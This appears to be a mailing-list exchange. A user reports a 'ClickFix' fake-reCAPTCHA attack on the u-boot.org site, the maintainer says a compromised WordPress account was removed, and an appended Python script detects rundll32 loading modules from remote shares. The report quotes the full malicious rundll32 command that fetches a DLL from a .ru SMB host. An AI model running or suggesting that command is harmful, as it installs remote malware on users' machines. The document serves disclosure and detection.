Hi Zayn,

On Mon, 23 Feb 2026 at 03:02, zayn beedooles <[email protected]> wrote:
>
> I am reporting u-boot.org for hosting a "ClickFix" malware attack. The site
> uses a fake Google reCAPTCHA overlay to trick users into running a
> malicious command via the Windows Run dialog.
>
> *Malicious Command:* rundll32.exe \\hill-side-view-point.freshhill.ru
> \service\verification.google,#1
>
> The command uses rundll32.exe to execute a remote DLL from a Russian SMB
> share, bypassing browser sandboxing. HAR logs confirm the site is
> compromised and injecting these scripts into the user's session. This is a
> high-risk social engineering attack targeting developers.
>
> First, it tells the user to run this in the Run dialog to "continue" using
> the website, but it gives the hacker control. It uses the legitimate
> Windows `rundll32.exe` utility to execute code outside the browser's safe
> "sandbox".
> The command points to a remote SMB share on the Russian domain `
> hill-side-view-point.freshhill.ru`*
> It attempts to load and run a malicious DLL disguised as `
> verification.google`, likely an infostealer or ransomware.
>
> I don't know if this may be the wrong person, but I have already reported
> the malware and your website to prevent more victims from getting hacked by
> Russians. How do I know? "hill-side-view-point.freshhill.ru", it ends with
> ".ru". Thank you and have a good day.

Thanks for the report. An old WordPress account was compromised. It has been deleted and various measures have been put in place to ensure there is no repeat. We can share more detail privately to those interested.

Regards,
Simon
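For defenders triaging the command pattern described in the report (rundll32.exe pointed at a module on a remote share), the following is an added detection example, not part of the original thread or of any U-Boot project code. It checks process command lines or Run-dialog history entries; the function names, the allowlist parameter and all sample hosts are assumptions constructed for illustration.

```python
import re

# rundll32 followed by its "<module>,<entry>" argument.
RUNDLL = re.compile(r'(?i)(?:^|[\\/\s"])rundll32(?:\.exe)?"?\s+(?P<args>.+)$')
# \\host\share\... or the WebDAV form \\host@port\...
UNC = re.compile(r'^\\\\(?P<host>[^\\/@\s]+)(?:@(?P<port>[^\\/\s]+))?[\\/].+$')

def inspect(cmdline, allowed_hosts=()):
    """Return a finding if cmdline makes rundll32 load a module over UNC."""
    # Run-dialog history (RunMRU) stores each entry with a trailing "\1".
    cmd = re.sub(r'\\1$', '', cmdline.strip())
    m = RUNDLL.search(cmd)
    if not m:
        return None
    target, sep, entry = m.group("args").rpartition(",")
    if not sep:                       # no ",entry" part present
        target, entry = entry, ""
    target = target.strip().strip('"')
    u = UNC.match(target)
    if not u or u.group("host").lower() in allowed_hosts:
        return None
    name = target.rsplit("\\", 1)[-1]
    ext = name.rsplit(".", 1)[-1].lower() if "." in name else ""
    reasons = ["module loaded from remote UNC path"]
    if ext != "dll":
        reasons.append("module extension is not .dll")
    if entry.strip().startswith("#"):
        reasons.append("export called by ordinal")
    if u.group("port"):
        reasons.append("WebDAV host@port form")
    return {"host": u.group("host").lower(), "module": target, "reasons": reasons}

def scan(lines, allowed_hosts=()):
    """Inspect every line and keep only the findings."""
    return [f for f in (inspect(l, allowed_hosts) for l in lines) if f]

# Constructed sample command lines (hosts are placeholders, not from the report).
SAMPLE = [
    r'rundll32.exe \\files.example.test\service\check.widget,#1\1',
    r'"C:\Windows\System32\rundll32.exe" shell32.dll,Control_RunDLL',
    r'C:\Windows\System32\rundll32.exe "\\fs01.corp.example\tools\helper.dll",Start',
    r'rundll32 \\cdn.example.test@8080\DavWWWRoot\x.dll,#2',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE, allowed_hosts={"fs01.corp.example"}):
        print(finding["host"], "|", "; ".join(finding["reasons"]))
```

A finding with only the first reason is usually an internal file server that belongs on the allowlist; a non-.dll extension combined with an ordinal export matches the shape of the command quoted above.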

